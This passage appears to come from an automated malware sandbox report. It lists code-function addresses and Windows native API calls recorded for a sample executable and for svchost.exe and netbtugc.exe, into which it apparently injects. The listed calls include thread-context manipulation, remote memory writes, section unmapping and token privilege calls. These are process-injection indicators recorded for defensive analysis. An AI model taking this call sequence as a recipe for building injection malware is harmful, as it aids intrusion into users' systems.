            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03572CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03573010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03573090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03573D70 NtOpenThread
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03573D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B24340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B24650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B235C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B239B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B22C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B23090 NtSetValueKey
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B23010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B23D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03B23D70 NtOpenThread
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03308F50 NtDeleteFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03308E60 NtReadFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03308CF0 NtCreateFile
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03309160 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\netbtugc.exe Code function: 6_2_03309000 NtClose
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00431BE8 GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0042200C
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0041A217
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00412216
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0042435D
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_004033C0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0044F430
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_004125E8
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0044663B
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_004096A0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00413801
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0042096F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_004129D0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_004119E3
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0041C9AE
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0047EA6F
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0040FA10
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0044EB59
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00423C81
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00411E78
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00442E0C
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00420EC0
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_0044CF17
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_00444FD2
            Source: C:\Users\user\Desktop\fJD7ivEnzm.exe Code function: 0_2_04199E80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00418113
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040F9C3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040F9BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402209
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402210
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004162FE
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_004162BC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00416303
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040FBE3
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0040DC63
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_00402DC0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0042E653
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036003E6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C02C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03530100
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F81CC
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_036001AA
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F41A2
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03564750
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0355C6E0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03600591
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F2446
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E4420
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035EE4F6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035F6BD7
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0360A9A6
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035429A0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0354A840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03542840
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0356E8F0
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035268B8
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035B4F40
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03560F30
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_035E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03582F281_2_03582F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532FC81_2_03532FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BEFA01_2_035BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540E591_2_03540E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FEE261_2_035FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FEEDB1_2_035FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03552E901_2_03552E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FCE931_2_035FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DCD1F1_2_035DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354AD001_2_0354AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353ADE01_2_0353ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03558DBF1_2_03558DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540C001_2_03540C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530CF21_2_03530CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E0CB51_2_035E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352D34C1_2_0352D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F132D1_2_035F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0358739A1_2_0358739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355B2C01_2_0355B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355D2F01_2_0355D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E12ED1_2_035E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035452A01_2_035452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0360B16B1_2_0360B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352F1721_2_0352F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357516C1_2_0357516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354B1B01_2_0354B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EF0CC1_2_035EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035470C01_2_035470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F70E91_2_035F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF0E01_2_035FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF7B01_2_035FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035856301_2_03585630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F16CC1_2_035F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F75711_2_035F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DD5B01_2_035DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035314601_2_03531460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FF43F1_2_035FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFB761_2_035FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B5BF01_2_035B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0357DBF91_2_0357DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355FB801_2_0355FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFA491_2_035FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F7A461_2_035F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B3A6C1_2_035B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EDAC61_2_035EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DDAAC1_2_035DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03585AA01_2_03585AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035E1AA31_2_035E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035499501_2_03549950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355B9501_2_0355B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D59101_2_035D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AD8001_2_035AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035438E01_2_035438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFF091_2_035FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03541F921_2_03541F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFFB11_2_035FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03549EB01_2_03549EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F1D5A1_2_035F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03543D401_2_03543D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F7D731_2_035F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355FDC01_2_0355FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B9C321_2_035B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035FFCF21_2_035FFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BB03E66_2_03BB03E6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AFE3F06_2_03AFE3F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAA3526_2_03BAA352
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B702C06_2_03B702C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B902746_2_03B90274
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BB01AA6_2_03BB01AA
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA41A26_2_03BA41A2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA81CC6_2_03BA81CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B8A1186_2_03B8A118
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE01006_2_03AE0100
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B781586_2_03B78158
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B820006_2_03B82000
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AEC7C06_2_03AEC7C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF07706_2_03AF0770
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B147506_2_03B14750
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0C6E06_2_03B0C6E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BB05916_2_03BB0591
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF05356_2_03AF0535
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B9E4F66_2_03B9E4F6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B944206_2_03B94420
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA24466_2_03BA2446
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA6BD76_2_03BA6BD7
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAAB406_2_03BAAB40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AEEA806_2_03AEEA80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF29A06_2_03AF29A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BBA9A66_2_03BBA9A6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B069626_2_03B06962
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AD68B86_2_03AD68B8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B1E8F06_2_03B1E8F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF28406_2_03AF2840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AFA8406_2_03AFA840
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B6EFA06_2_03B6EFA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE2FC86_2_03AE2FC8
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B10F306_2_03B10F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B92F306_2_03B92F30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B32F286_2_03B32F28
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B64F406_2_03B64F40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B02E906_2_03B02E90
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BACE936_2_03BACE93
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAEEDB6_2_03BAEEDB
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAEE266_2_03BAEE26
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF0E596_2_03AF0E59
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B08DBF6_2_03B08DBF
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AEADE06_2_03AEADE0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B8CD1F6_2_03B8CD1F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AFAD006_2_03AFAD00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B90CB56_2_03B90CB5
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE0CF26_2_03AE0CF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF0C006_2_03AF0C00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B3739A6_2_03B3739A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA132D6_2_03BA132D
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03ADD34C6_2_03ADD34C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF52A06_2_03AF52A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0D2F06_2_03B0D2F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B912ED6_2_03B912ED
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0B2C06_2_03B0B2C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AFB1B06_2_03AFB1B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BBB16B6_2_03BBB16B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B2516C6_2_03B2516C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03ADF1726_2_03ADF172
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA70E96_2_03BA70E9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAF0E06_2_03BAF0E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF70C06_2_03AF70C0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B9F0CC6_2_03B9F0CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAF7B06_2_03BAF7B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA16CC6_2_03BA16CC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B356306_2_03B35630
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B8D5B06_2_03B8D5B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BB95C36_2_03BB95C3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA75716_2_03BA7571
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAF43F6_2_03BAF43F
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AE14606_2_03AE1460
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0FB806_2_03B0FB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B65BF06_2_03B65BF0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B2DBF96_2_03B2DBF9
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFB766_2_03BAFB76
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B35AA06_2_03B35AA0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B8DAAC6_2_03B8DAAC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B91AA36_2_03B91AA3
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B9DAC66_2_03B9DAC6
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B63A6C6_2_03B63A6C
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFA496_2_03BAFA49
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA7A466_2_03BA7A46
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B859106_2_03B85910
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0B9506_2_03B0B950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF99506_2_03AF9950
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF38E06_2_03AF38E0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B5D8006_2_03B5D800
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFFB16_2_03BAFFB1
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF1F926_2_03AF1F92
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFF096_2_03BAFF09
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF9EB06_2_03AF9EB0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B0FDC06_2_03B0FDC0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA7D736_2_03BA7D73
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BA1D5A6_2_03BA1D5A
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03AF3D406_2_03AF3D40
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03BAFCF26_2_03BAFCF2
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_03B69C326_2_03B69C32
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F1A306_2_032F1A30
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032ECB806_2_032ECB80
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032EC9606_2_032EC960
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032EC9596_2_032EC959
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032EAC006_2_032EAC00
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F32596_2_032F3259
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F32A06_2_032F32A0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F329B6_2_032F329B
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_032F50B06_2_032F50B0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0330B5F06_2_0330B5F0
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390E3386_2_0390E338
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390E7EC6_2_0390E7EC
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390E4536_2_0390E453
            Source: C:\Windows\SysWOW64\netbtugc.exeCode function: 6_2_0390CB036_2_0390CB03
